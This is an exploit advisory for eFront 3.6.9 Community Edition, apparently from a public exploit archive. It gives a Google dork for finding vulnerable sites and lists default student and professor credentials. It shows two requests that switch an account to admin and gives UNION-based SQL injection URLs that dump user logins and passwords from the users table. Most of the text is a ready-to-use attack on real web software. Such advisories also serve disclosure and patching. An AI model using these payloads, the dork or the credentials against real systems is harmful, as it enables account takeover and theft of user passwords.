# Exploit Title: EFront <= 3.6.9 Community Edition Multiple Vulnerabilities # Google Dork: "eFront (version 3.6.9)" inurl:index.php?ctg=* # Date: 5/09/2011 # Public release: When 3.6.10 will be released # Author: IHTeam # Software Link: http://www.efrontlearning.net/download/download-efront.html # Tested on: efront_3.6.9_build11018 # Original Advisory: http://iht.li/FWh # Advisory code: http://iht.li/p/0VV Default username and password: student:student professor:professor How to become admin: Request 1: /change_account.php?login=admin Request 2: /userpage.php OR simple use the [Switch account] option on top of the page; Now you are in admin area; SQL Injection: www/student.php?ctg=messages&folder= UNION ALL SELECT 1,2,3,password,5,6,login,8,9,10,11,12 FROM users -- www/professor.php?ctg=messages&folder= UNION ALL SELECT 1,2,3,password,5,6,login,8,9,10,11,12 FROM users -- www/admin.php?ctg=messages&folder= UNION ALL SELECT 1,2,3,password,5,6,login,8,9,10,11,12 FROM users --